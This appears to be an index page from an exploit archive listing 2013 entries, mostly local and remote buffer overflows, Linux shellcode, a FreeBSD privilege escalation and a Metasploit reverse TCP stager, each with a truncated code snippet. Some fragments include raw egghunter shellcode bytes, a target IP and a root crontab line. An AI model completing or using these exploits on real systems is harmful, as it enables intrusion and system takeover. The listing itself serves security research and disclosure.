Mediacoder (.lst) - Local Buffer Overflow (SEH)
!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system"cls" os.system"color 3f" else: os.system"clear" print """ +Exploit Title: All Mediacoder Product SEH Buffer Overflow +Download All Product: http://www.mediacoderhq.com/editions.html...
ASC Timetables 2013 - Stack Buffer Overflow Vulnerability
Exploit for windows platform in category dos / poc !/usr/bin/python Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability Researcher : Souhail Hammou Dark-Puzzle Research Team : http://itsecurity.ma Facebook : http://www.facebook.com/dark.puzzle.sec Date : 22/06/2013 Download Website ...
FreeBSD 9.0+ Privilege Escalation
/ CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap poc by SynQ, rdot.org, 6/2013 don't forget to cp /etc/crontab /tmp / include include include include include include include include char sc="\t\t\t\t\troot\t/tmp/bukeke\n"; void child int status; status = ptracePTTRACEME, 0, 0, 0; if...
Adrenalin Player 2.2.5.3 (.wax) - SEH Buffer Overflow
Exploit for windows platform in category local exploits !/usr/bin/python Title: Adrenalin Player SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 16th, 2013 Author: onying @onyiing Blog : http://itsecuritynewbie.blogspot.com/ Thanks to:...
Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF
Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...
Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)
Linux/x86 - Egghunter 0x5090 Shellcode 38 bytes. Shellcode exploit for Linux/x86 platform / Title : egghunter shellcode : hunter 30 bytes, marker 8 bytes, shellcode 28 bytes Date : 28 May 2013 Author : Russell Willis Tested on: Linux/x86 SMP Debian 3.2.41-2 i686 Comments: Using sigaction system cal...
Samsung Galaxy S4 Android Bootloader Unlocked
Those of you who like to tinker and jailbreak Android phones should take notice of some new research conducted on Samsung Galaxy S4 Android devices shipped by AT&T and Verizon. Both device makers ship the Galaxy S4 smartphones with a locked down bootloader that prevents users from uploading custo...
Ophcrack 3.5.0 - Code Execution Local Buffer Overflow
Ophcrack 3.5.0 - Code Execution Local Buffer Overflow Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF Date: 21.05.2013 Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link:...
Linux dup2 Command Shell, Reverse TCP Stager
dup2 socket in r12, then execve. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework ReverseTcp ---------- Linux reverse TCP stager. module MetasploitModule CachedSize = 260 include...
Linux/x86 - Reverse TCP Bind Shellcode 92 bytes
Linux/x86 - Reverse TCP Bind Shellcode 92 bytes. Shellcode exploit for linx86 platform / Title : reversetcpbindshell 92 bytes Date : 16 May 2013 Author : Russell Willis Tested on: Linux/x86 SMP Debian 3.2.41-2 i686 $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf32-i3...
No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow
No-IP Dynamic Update Client DUC 2.1.9 - Local IP Address Stack Overflow !/usr/bin/env python Title: No-IP Dynamic Update Client DUC 2.1.9 local IPaddress stack overflow Author: Alberto Ortega @a0rtega [email protected] Date: May 11 2013 vulnerability discovered Background: No-IP is probably the...
No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow
!/usr/bin/env python Title: No-IP Dynamic Update Client DUC 2.1.9 local IPaddress stack overflow Author: Alberto Ortega @a0rtega [email protected] Date: May 11 2013 vulnerability discovered Background: No-IP is probably the most used Dynamic DNS provider worldwide, their Dynamic Update Client D...
No-IP Dynamic Update Client 2.1.9 Stack Overflow
!/usr/bin/env python Title: No-IP Dynamic Update Client DUC 2.1.9 local IPaddress stack overflow Author: Alberto Ortega @a0rtega [email protected] Date: May 11 2013 vulnerability discovered Background: No-IP is probably the most used Dynamic DNS provider worldwide, their Dynamic Update Client D...
[ShellNoob v1.0] Shellcode Writing Toolkit
ShellNoob is a shellcode writing toolkit that helps you write shellcode, convert it between different formats, and get through some of the boring steps. Features: convert shellcode between different formats currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty interactive opcode-to-binary...
Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication
Early 2012 ESET company a mysterious malware, dubbed the Avatar rootkit Win32/Rootkit.Avatar, advertised in the underground forums by Russian cyber crime. "We present you here previously announced product. In connection with work on other projects, we moved the release date for the public from Ma...
AudioCoder 0.8.18 - Local Buffer Overflow (SEH)
!/usr/bin/env ruby Exploit Title:AudioCoder 0.8.18 Buffer Overflow Exploit SEH Download link :http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe Vulnerable Product:AudioCoder Date found: 30.04.2013 Date publish: 01.05.2013 RST Author: metacom Version:...
PHP Code Inside GIF Image
GIF images that contain PHP code can be used for malicious purposes. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...
Toxin Based Brobot HTTP Request
Blocking specific Toxin Based Brobot HTTP requests. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...
FuzeZip 1.0.0.131625 - Local Buffer Overflow (SEH)
FuzeZip 1.0.0.131625 - Local Buffer Overflow SEH !/usr/bin/python Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0 Date: 16.Apr.2013 Vulnerability reported Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage:...